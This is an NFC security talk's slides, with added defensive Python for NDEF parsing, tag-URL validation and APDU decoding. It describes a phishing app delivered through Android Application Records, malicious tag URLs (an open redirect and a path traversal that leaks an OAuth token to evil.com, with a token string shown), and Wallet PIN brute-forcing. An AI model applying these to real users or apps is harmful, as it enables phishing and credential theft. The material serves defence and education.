Corey Benninger, Max Sobell
NFC Overview
What is NFC?
Hardware basics behind NFC
Antennas and waveforms
Tags and access control
NFC Data Exchange Format (NDEF)
NFC Application Attacks
Privacy
Mobile Wallets
RFID technology ISO 14443-1:4 (13.56 MHz)
▪ Physical characteristics
▪ Radio frequency power and signal interface
▪ Initialization and anti-collision
▪ Transmission protocol
No encryption or access control!
Devices:
▪ Powered: PCD, interrogator, reader, device
▪ Unpowered: PICC, target, tag, transponder
http://www.mockingweb.com/wp-content/uploads/2011/11/Near-field-communcation.png
RFID:
125 KHz/13.56 MHz/900 MHz
NFC (what we’ll be focusing on):
A type of RFID
Short range (induction v backscatter)
Enough computational power to perform basic crypto
NFC != “proximity cards”: don’t think of NFC like proximity cards. It can mimic these, but often NFC is much more complex.
NFC enabled posters.
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
Replace a traditional antenna with coils of wire
Samsung Nexus S
Samsung Galaxy Nexus (in the battery)
Energy one way, data two ways
http://www.eurasip.org/Proceedings/Ext/RFID2007/pdf/s1p4.pdf
Inductive coupling: current device ranges severely limited (4-10 cm)
Near Field: wavelength (~20m) much longer than antenna diameter
Kristen Paget: 900 MHz read ranges > 66 meters
That is not NFC
NFC theoretically limited to ~10m
Encoding: ASK
Reader -> Tag: Modified Miller @ 100% ASK
Tag -> Reader: Manchester @ 10% ASK
Baudrates:
106 kbps, 212 kbps,
424 kbps, 848 kbps
Tag: 10% ASK Reader: 100% ASK
Each Tag has a UID – unique identifier
Serial number for card
▪ Locked on physical tags
▪ but not on a $80 Chinese-manufactured knock-off card
Can be cloned using an emulated card
More than just memory sectors
Reader sends requests to read and write data from tag
Tag can deny request based on access controls
Mifare Tags
If you want access control, go with DESFire EV1 (for now)
"Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World" by David Oswald and Christof Paar
Tag           Locked for Writing   Access Control   Broken   Year Broken
Ultralight    1                    0                0
Classic       1                    1                1        2008
DESFire       1                    1                1        2011
DESFire EV1   1                    1                0
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
NDEF – NFC Data Exchange Format
Specs come from NFC Forum
▪ www.nfc-forum.org
NDEF Message contains NDEF Record(s)
Common record types
▪ Text
▪ URI
  ▪ 0x00 through 0x23 to map bytes to prefixes.
▪ Smart Poster
  ▪ Text and URIs
Decimal Hex Protocol
0 0x00 N/A. No prepending
1 0x01 http://www.
2 0x02 https://www.
3 0x03 http://
4 0x04 https://
5 0x05 tel://
… … …
11 0x0B smb://
12 0x0C nfs://
13 0x0D ftp://
27 0x1B tcpobex://
36-255 0x24 – 0xFF RFU
Section 3.2.2 of NFCForum URI 1.0 spec
D1 01 0D 55 05 2B 31 35 35 35 31 32 33 34 35 36 37 FE
D1: record begin
01: length of payload length
▪ 0D: payload length
▪ 55: payload type (URI)
▪ 05: payload identifier (tel:// prefix)
▪ 2B->37: payload (“+15551234567”)
FE: terminal value character
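As an added example (not code from the talk), the following Python builds and parses NDEF short records, decodes the record bytes shown above by expanding the URI identifier byte with the NFC Forum prefix table, and checks every length field against the bytes actually present. It also recognises the Android Application Record (external type android.com:pkg) discussed on later slides. Assumptions: the prefix table is the NFC Forum URI RTD one, which spells the 0x05 prefix as tel: (the slide writes tel://); the two-record message with a URL record plus an AAR is constructed here for the test, not read from a real tag.

```python
# Added example (not code from the talk): build and parse NDEF short records,
# expand NFC Forum URI-prefix bytes, and recognise Android Application Records.
# The record bytes from the slide (D1 01 0D 55 05 2B ... FE) are one input; the
# two-record message (URL record plus AAR for com.porkmobile) is constructed here.

# NFC Forum URI RTD prefix table (identifier byte -> prefix). The RTD spells the
# 0x05 prefix "tel:" (the slide writes tel://); 0x24-0xFF are reserved (RFU).
URI_PREFIXES = {
    0x00: "", 0x01: "http://www.", 0x02: "https://www.", 0x03: "http://",
    0x04: "https://", 0x05: "tel:", 0x06: "mailto:",
    0x07: "ftp://anonymous:anonymous@", 0x08: "ftp://ftp.", 0x09: "ftps://",
    0x0A: "sftp://", 0x0B: "smb://", 0x0C: "nfs://", 0x0D: "ftp://",
    0x0E: "dav://", 0x0F: "news:", 0x10: "telnet://", 0x11: "imap:",
    0x12: "rtsp://", 0x13: "urn:", 0x14: "pop:", 0x15: "sip:", 0x16: "sips:",
    0x17: "tftp:", 0x18: "btspp://", 0x19: "btl2cap://", 0x1A: "btgoep://",
    0x1B: "tcpobex://", 0x1C: "irdaobex://", 0x1D: "file://",
    0x1E: "urn:epc:id:", 0x1F: "urn:epc:tag:", 0x20: "urn:epc:pat:",
    0x21: "urn:epc:raw:", 0x22: "urn:epc:", 0x23: "urn:nfc:",
}
TNF_WELL_KNOWN, TNF_EXTERNAL = 0x01, 0x04
AAR_TYPE = b"android.com:pkg"   # external type Android uses for an AAR
TERMINATOR = 0xFE               # terminator TLV that ends a tag's data area


def build_short_record(tnf, rtype, payload, first=False, last=False):
    """Encode one record with the SR flag set: header, type len, payload len, type, payload."""
    if len(payload) > 255 or len(rtype) > 255:
        raise ValueError("short-record fields are limited to 255 bytes")
    header = (first << 7) | (last << 6) | (1 << 4) | (tnf & 0x07)   # MB, ME, SR, TNF
    return bytes([header, len(rtype), len(payload)]) + rtype + payload


def build_uri_record(uri, first=False, last=False):
    """Abbreviate the URI with the longest matching prefix and emit a well-known 'U' record."""
    code, prefix = max(((c, p) for c, p in URI_PREFIXES.items() if uri.startswith(p)),
                       key=lambda cp: len(cp[1]))
    return build_short_record(TNF_WELL_KNOWN, b"U",
                              bytes([code]) + uri[len(prefix):].encode("utf-8"), first, last)


def build_aar_record(package, first=False, last=False):
    """Android Application Record: TNF external, type android.com:pkg, payload = package name."""
    return build_short_record(TNF_EXTERNAL, AAR_TYPE, package.encode("ascii"), first, last)


def decode_record(tnf, rtype, payload):
    """Add a decoded view for the record types the slides discuss (URI, Text, AAR)."""
    rec = {"tnf": tnf, "type": rtype, "payload": payload}
    if tnf == TNF_WELL_KNOWN and rtype == b"U":
        if not payload:
            raise ValueError("empty URI payload")
        prefix = URI_PREFIXES.get(payload[0])
        if prefix is None:
            raise ValueError("reserved URI identifier 0x%02X" % payload[0])
        rec["uri"] = prefix + payload[1:].decode("utf-8")
    elif tnf == TNF_WELL_KNOWN and rtype == b"T":
        if not payload:
            raise ValueError("empty Text payload")
        lang_len = payload[0] & 0x3F       # status byte: bit 7 = UTF-16, low 6 bits = language length
        encoding = "utf-16" if payload[0] & 0x80 else "utf-8"
        rec["lang"] = payload[1:1 + lang_len].decode("ascii")
        rec["text"] = payload[1 + lang_len:].decode(encoding)
    elif tnf == TNF_EXTERNAL and rtype == AAR_TYPE:
        rec["package"] = payload.decode("ascii")
    return rec


def parse_ndef_message(data):
    """Parse one NDEF message; stops at the ME record or a terminator TLV.
    Every length is checked against the bytes present, so a record that claims
    more payload than the tag carries is rejected instead of over-read."""
    records, pos = [], 0
    while pos < len(data) and data[pos] != TERMINATOR:
        if pos + 2 > len(data):
            raise ValueError("truncated record header")
        hdr = data[pos]
        mb, me, cf, sr, il = [(hdr >> b) & 1 for b in (7, 6, 5, 4, 3)]
        tnf = hdr & 0x07
        if cf:
            raise ValueError("chunked records are not handled here")
        if mb != (len(records) == 0):              # MB only on the first record
            raise ValueError("message-begin flag out of place")
        type_len, pos = data[pos + 1], pos + 2
        len_bytes = 1 if sr else 4                 # SR: 1-byte payload length, else 4
        if pos + len_bytes + il > len(data):
            raise ValueError("truncated record header")
        payload_len = int.from_bytes(data[pos:pos + len_bytes], "big")
        pos += len_bytes
        id_len = data[pos] if il else 0
        pos += il
        end = pos + type_len + id_len + payload_len
        if end > len(data):
            raise ValueError("record runs %d bytes past the end of the data" % (end - len(data)))
        rtype = data[pos:pos + type_len]
        payload = data[pos + type_len + id_len:end]
        records.append(decode_record(tnf, rtype, payload))
        pos = end
        if me:
            break
    return records


def is_malformed(data):
    """True when the parser rejects the bytes; an app should drop such a tag, not act on it."""
    try:
        parse_ndef_message(data)
        return False
    except ValueError:
        return True


# Sample inputs: the slide's tel: record, and a constructed URL + AAR message.
SLIDE_BYTES = bytes.fromhex("D1010D55052B3135353531323334353637FE")
TAG_WITH_AAR = (build_uri_record("http://porkmobile.com", first=True)
                + build_aar_record("com.porkmobile", last=True))

if __name__ == "__main__":
    for rec in parse_ndef_message(SLIDE_BYTES) + parse_ndef_message(TAG_WITH_AAR):
        print(rec)
```

The parser treats the bytes from the tag the way the later slides ask app developers to treat NDEF data: lengths are cross-checked and reserved identifier bytes are refused, so a tag whose payload length points past the end of the data is reported as malformed rather than parsed into garbage.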
Google Tags Application crash*
NDEF Stack built in to Android
* On Gingerbread. Java level parsing crash, not exploitable
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
Collin Mulliner – (www.mulliner.org)
Python code for working with Nokia 6313 NFC and Nokia 6212 Classic
Francois Kooman, Roel Verdult
Using NFC to trigger bluetooth and file transfers
Nick von Dadelszen - (www.lateralsecurity.com)
Kiwicon 2011 - Mobile point of sales reader w/ RFIDIOt
Messing with posters
Access control set?
Read-only option?
Physical protection?
Altering data: use write locking or access control
Zapping/DoS: ???
“Counterfeit” tags: NFC Signature Record Type Definition Technical Specification
▪ Each record is signed
▪ Issues with Franken-tags, cloning, signature-checking...
White-list of UIDs
▪ Mgmt pains
Countermeasures
Blackberry requires two clicks to open URL
Push for Zero Click NFC integration
Some URIs require no user interaction
▪ Contacts, URLs, Market
“Beam” data from device to device
▪ Pass NDEF messages instead of emulating tags
▪ Simple NDEF Exchange Protocol (SNEP)
What if the user does not need to click, only tap?
http://developer.android.com/guide/topics/nfc/nfc.html#ndef
Register a detailed intent filter in the app’s AndroidManifest.xml
No interaction needed when scanning a URL with http://local.google.com/maps
What prevents a malicious application from also requesting this intent?
We can craft our own icon and title for our registered intent filter
Can you tell which is the real maps application?
NOTE: See Android Application Records, introduced in Android 4.0 (API level 14) for countermeasure
AAR from Google:
“If no application can start with the AAR, go to the Android Market to download the application based on the AAR.”
Set Android Application Record
Our application in the market
Add our own tag (Bigger! On the front!)
Successfully phished!
The tag:
NDEF URL Record: http://porkmobile.com
AAR: com.porkmobile
The app:
Webview to our server
Collect: credit cards, logins, etc…
Countermeasures: In Google’s market…
Developing an app accepting NDEF data?
Treat the NDEF data as untrusted. Validate like any user supplied data.
Example: Foursquare added NFC check-ins.
http://m.foursquare.com/checkin?venueID=27016678&venueName=Time%20Square%20New%20York
VenueID was not validated to match VenueName before check-in was submitted
Can’t trust tag data
▪ Fixed in version: 2011.08.11 – removed NFC check-in
▪ Collin Mulliner @ NinjaCon 2011
Don’t blindly pass a URL (or data) from a tag
What if… Intent filter “api.foursquare.com”
Your user is persistently logged in
Expect “http://api.foursquare.com/checkin?venueId=1”
But get
▪ http://api.foursquare.com/account/addfriend?userId=666
▪ http://api.foursquare.com/redirect?domain=www.evil.com
▪ Is your authentication token added to the URL?
ERROR/VenueActivity(536): java.lang.IllegalArgumentException: Illegal character in path at index 42: https://api.foursquare.com/v2/venues/1/..\..\..\..\www.evil.com?oauth_token=4CXOTLA50WHDKOJUGS4GQQ1XBINTPX5DSCFSRVARFH5YXE0O&v=20110525
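One way to apply the “treat NDEF data as untrusted” advice, as an added example that is neither Foursquare’s code nor the talk’s: instead of handing a tag URL to an intent or a WebView, the app parses it and accepts only an exact host, a fixed set of actions, and the parameters each action may carry; anything with a backslash, a dot in the path, userinfo, a port, or a credential parameter is refused. The host name, the /checkin action, the venueId pattern and the forbidden-parameter list are assumptions chosen to match the slide’s example URLs, not the real Foursquare API; the sample inputs are the URLs from the slides, with the leaked token replaced by a placeholder.

```python
# Added example (not Foursquare's code or the talk's): an allow-list validator
# for a URL read from an NFC tag. Host, action set and parameter rules are
# assumptions chosen to fit the slide's example URLs, not the real API.
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_SCHEMES = {"http", "https"}
EXPECTED_HOST = "api.foursquare.com"
# Action path -> the parameters it may carry and the pattern each must match.
ALLOWED_ACTIONS = {
    "/checkin": {"venueId": re.compile(r"^[0-9]{1,12}$")},
}
# Credentials come from the app's own storage, never from the tag.
FORBIDDEN_PARAMS = {"oauth_token", "access_token", "token"}
# No dots, percent-escapes or backslashes in the path: that excludes ".." and
# the "\..\..\" form seen in the logcat line on the slide.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_/-]*$")
MAX_URL_LEN = 512


def validate_tag_url(url):
    """Return {"action": path, "params": {...}} for an acceptable tag URL, else None."""
    if not isinstance(url, str) or len(url) > MAX_URL_LEN:
        return None
    if "\\" in url or any(ch.isspace() for ch in url):
        return None
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None
    # Compare the whole netloc: userinfo ("host@evil.com"), ports and
    # look-alike subdomains all fail an exact match.
    if parts.netloc.lower() != EXPECTED_HOST or parts.fragment:
        return None
    if not SAFE_PATH.match(parts.path):
        return None
    rules = ALLOWED_ACTIONS.get(parts.path)
    if rules is None:                       # e.g. /account/addfriend, /redirect
        return None
    params = {}
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key in FORBIDDEN_PARAMS or key not in rules:
            return None
        if len(values) != 1 or not rules[key].match(values[0]):
            return None
        params[key] = values[0]
    if set(params) != set(rules):           # every expected parameter, exactly once
        return None
    return {"action": parts.path, "params": params}


def check_in_from_tag(url):
    """What the app does with the tag: act only on a validated venue id, else nothing."""
    verdict = validate_tag_url(url)
    if verdict is None or verdict["action"] != "/checkin":
        return None
    return int(verdict["params"]["venueId"])


# Constructed inputs: the expected URL from the slide and the ones it contrasts it with
# (the leaked token in the logcat line is replaced by a placeholder).
SAMPLES = [
    "http://api.foursquare.com/checkin?venueId=1",
    "http://api.foursquare.com/account/addfriend?userId=666",
    "http://api.foursquare.com/redirect?domain=www.evil.com",
    "https://api.foursquare.com/v2/venues/1/..\\..\\..\\..\\www.evil.com"
    "?oauth_token=TOKEN_PLACEHOLDER&v=20110525",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_in_from_tag(sample), sample)
```

The point of the allow-list shape is that the validator never has to enumerate bad inputs: the addfriend and redirect URLs fail simply because their paths are not registered actions, and the traversal URL fails on the backslash check before the URL is even split. The app then builds its own API request from the validated venue id and attaches its token itself, so nothing from the tag reaches the server verbatim.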
“NFCShortcuts” app on Blackberry never writes to the tags
Triggers based on UID
Limits the attack surface
NFC as a privacy concern?
Smartphone has all the megabits anyway, right?
Can be as good as GPS data
Reading a UID at a specific time, may put you at a specific location
Transaction data at a Point of Sales could be sensitive (you spent how much where?)
Who your friends are (or what devices your friends have)
Reading an NFC tag generates an intent
seen in logcat, but not recorded to file system
Default “Tags” app
Stores tag and timestamp
/data/data/com.google.android.tag/databases/tags.db
Data can be left behind on tags from previous writes
Make sure to zero out or format used tags
NDEF terminal value character, length fields
▪ Have to read sector by sector
How do you protect credit card info on your phone from…
other software listening for NFC tags?
“droid dream” like malware and other rooted applications?
a stolen device?
Yo Dawg, I heard you like computers
▪ Runs a base operating system
▪ Embedded applications
▪ Simple communication interface
▪ Strong crypto and access control
▪ Pre-shared key known to the SE “owner”
Even if your device is rooted, you won’t have full access to the SE
http://code.google.com/p/seek-for-android/
From the “NFC Antenna”: be within the physical NFC range
From other apps:
▪ Signed with NFCR or RESE keys on BB
▪ Signed by Google*
http://supportforums.blackberry.com/t5/tkb/articleprintpage/tkb-id/java_dev@tkb/article-id/623
* Unless rooted device or 3rd party SE
APDU - Application Protocol Data Unit (ISO7816-4)
Defines the communication between OS applications to applets in the Secure Element
BH08 - Ivan Buetler “SmartCard APDU Analysis”
Google Wallet Example
send: 00 A4 04 00 00
▪ 5 bytes (SELECT [default CardManager])
recv: 6F 65 84 08 A0 00 00 00 03 00 00 00 ... 90 00 ▪ “90 00” - OK
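As an added example (not code from the talk or from Google Wallet), the following Python decodes ISO 7816-4 short-form command and response APDUs the way you would when reading a trace of what an app sends over the bus to the secure element: it classifies the command case, names common instructions and status words, and walks the BER-TLV file control information a SELECT returns. The instruction and status-word names are the common ISO 7816-4 / GlobalPlatform ones; because the slide’s response is truncated (“...”), a shorter FCI carrying the same DF name (tag 84) is constructed here for the TLV parser.

```python
# Added example (not from the talk or Google Wallet): decode ISO 7816-4
# short-form command and response APDUs, as you would from a captured trace
# between an app and the secure element. The slide's SELECT response is
# truncated ("..."), so a shorter, constructed FCI is used for the TLV parser.

INS_NAMES = {0xA4: "SELECT", 0xB0: "READ BINARY", 0xB2: "READ RECORD",
             0xD6: "UPDATE BINARY", 0x20: "VERIFY", 0xCA: "GET DATA",
             0x84: "GET CHALLENGE", 0x82: "EXTERNAL AUTHENTICATE",
             0x88: "INTERNAL AUTHENTICATE", 0xC0: "GET RESPONSE"}
STATUS_WORDS = {0x9000: "OK", 0x6700: "wrong length",
                0x6982: "security status not satisfied",
                0x6983: "authentication method blocked",
                0x6985: "conditions of use not satisfied",
                0x6A80: "incorrect data", 0x6A82: "file or application not found",
                0x6A86: "incorrect P1/P2", 0x6D00: "INS not supported",
                0x6E00: "CLA not supported"}


def parse_command(apdu):
    """Split a short-form command APDU into CLA/INS/P1/P2, data and Le, and classify its ISO case."""
    if len(apdu) < 4:
        raise ValueError("command APDU needs at least CLA INS P1 P2")
    cla, ins, p1, p2 = apdu[:4]
    body = apdu[4:]
    cmd = {"cla": cla, "ins": ins, "ins_name": INS_NAMES.get(ins, "unknown"),
           "p1": p1, "p2": p2, "data": b"", "le": None}
    if not body:                                   # case 1: no data, no response data
        cmd["case"] = 1
    elif len(body) == 1:                           # case 2: Le only
        cmd["case"], cmd["le"] = 2, body[0] or 256    # Le = 00 means "up to 256 bytes"
    else:
        lc = body[0]
        if len(body) == 1 + lc:                    # case 3: Lc + data
            cmd["case"], cmd["data"] = 3, bytes(body[1:])
        elif len(body) == 2 + lc:                  # case 4: Lc + data + Le
            cmd["case"], cmd["data"], cmd["le"] = 4, bytes(body[1:1 + lc]), body[-1] or 256
        else:
            raise ValueError("Lc=%d does not match a body of %d bytes" % (lc, len(body)))
    return cmd


def select_by_aid(aid):
    """Build the SELECT-by-name command (CLA 00, INS A4, P1 04) for an applet AID."""
    return bytes([0x00, 0xA4, 0x04, 0x00, len(aid)]) + bytes(aid) + b"\x00"


def describe_status(sw1, sw2):
    """Human-readable meaning of a status word, including the 63 Cx retry counter."""
    sw = (sw1 << 8) | sw2
    if sw in STATUS_WORDS:
        return STATUS_WORDS[sw]
    if sw1 == 0x63 and sw2 & 0xF0 == 0xC0:         # retry counter, e.g. after a failed VERIFY
        return "verification failed, %d tries left" % (sw2 & 0x0F)
    if sw1 == 0x61:
        return "%d more response bytes available via GET RESPONSE" % sw2
    if sw1 == 0x6C:
        return "wrong Le, resend with Le=%d" % sw2
    return "unknown status %04X" % sw


def parse_response(rapdu):
    """Split a response APDU into data and status word."""
    if len(rapdu) < 2:
        raise ValueError("response APDU needs SW1 SW2")
    data, sw1, sw2 = bytes(rapdu[:-2]), rapdu[-2], rapdu[-1]
    return {"data": data, "sw": (sw1 << 8) | sw2, "ok": (sw1, sw2) == (0x90, 0x00),
            "status": describe_status(sw1, sw2)}


def parse_tlv(data):
    """Parse BER-TLV (1- or 2-byte tags, definite lengths up to 0x82), descending into constructed tags."""
    out, pos = [], 0
    while pos < len(data):
        tag = data[pos]
        pos += 1
        if tag & 0x1F == 0x1F:                     # two-byte tag
            tag = (tag << 8) | data[pos]
            pos += 1
        length = data[pos]
        pos += 1
        if length == 0x81:
            length, pos = data[pos], pos + 1
        elif length == 0x82:
            length, pos = int.from_bytes(data[pos:pos + 2], "big"), pos + 2
        elif length >= 0x80:
            raise ValueError("unsupported length form 0x%02X" % length)
        value = bytes(data[pos:pos + length])
        if len(value) != length:
            raise ValueError("TLV value truncated")
        pos += length
        first_byte = tag >> 8 if tag > 0xFF else tag
        out.append((tag, parse_tlv(value) if first_byte & 0x20 else value))   # bit 5 = constructed
    return out


# The slide's SELECT command, and a constructed (short) FCI response carrying
# the same DF name (tag 84, AID A0 00 00 00 03 00 00 00) the slide's bytes start with.
SLIDE_SELECT = bytes.fromhex("00A4040000")
SAMPLE_RESPONSE = bytes.fromhex("6F0A8408A0000000030000009000")

if __name__ == "__main__":
    print(parse_command(SLIDE_SELECT))
    resp = parse_response(SAMPLE_RESPONSE)
    print(resp["status"], parse_tlv(resp["data"]))
```

The 63 Cx branch is the one worth noticing in the context of the later wallet slides: when PIN verification happens inside the secure element, the remaining-tries counter comes back in the status word of the VERIFY response, which is what keeps the lockout count out of user-land code.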
Free $10 for contactless payments
Early build - lots of debug code
▪ BS Bank
▪ <- Debug Menu
ViaForensics post stored data
Can work on a NS 4G or NS or Galaxy Nexus (thanks XDA!)
▪ Non-root builds means signed by Google
http://intrepidusgroup.com/insight/2011/09/a-brave-new-wallet-first-look-at-decompiling-google-wallet/
Zvelo team disclosed Google Wallet PIN is not stored in the secure element
Physical access of the device needed for abuse
On a rooted device
▪ The PIN can be brute forced (10,000 possibilities < 5 sec)
https://zvelo.com/blog/entry/google-wallet-security-pin-exposure-vulnerability
Don’t trust your user-land application
Keep payment secrets in the secure element
Keep lockout counts in the secure element
Do sensitive operations in the secure element
▪ Pin verification
Treat the bus to the secure element as insecure
“Hidden” APDUs will be found
▪ By monitoring or fuzzing
What about a “Tap” attack with a compromised point of sales reader? Pablos Holman’s boingboing type “use the reader” hack
http://tv.boingboing.net/2008/03/19/how-to-hack-an-rfide.html
For Android: The NFC antenna in your phone is only activated when the screen is powered on*
* For Google Nexus devices, although some NFC chips may work in “low power” or “no power” modes.
Blackberry w/ NFC: The default is to ALLOW card emulation when LOCKED or POWERED OFF! *
* The BB Device does not appear to “read” or take actions on tags in locked or powered off modes
Holman’s tap works to grab your own Google Wallet number… if your device is on, unlocked, passcode entered, and before it times out
ie: good countermeasures against IRL attacks
Positives
Can disable the radio
▪ (can’t turn off physical cards)
GPS to find my credit card
Easier to see transaction history
▪ Or current balances
Gives you more security control than physical cards
▪ Device passcode
NFC: it can be another vector to mobile devices and apps
Developers beware! Untrusted data!
Pen-Testers: It’s just getting started…
Questions?
Thank you to: Jason Ross @ IG, Collin @ www.mulliner.org, RFnoID @ Stevens
Our Blog http://www.intrepidusgroup.com/insight
@0xbenn @msobell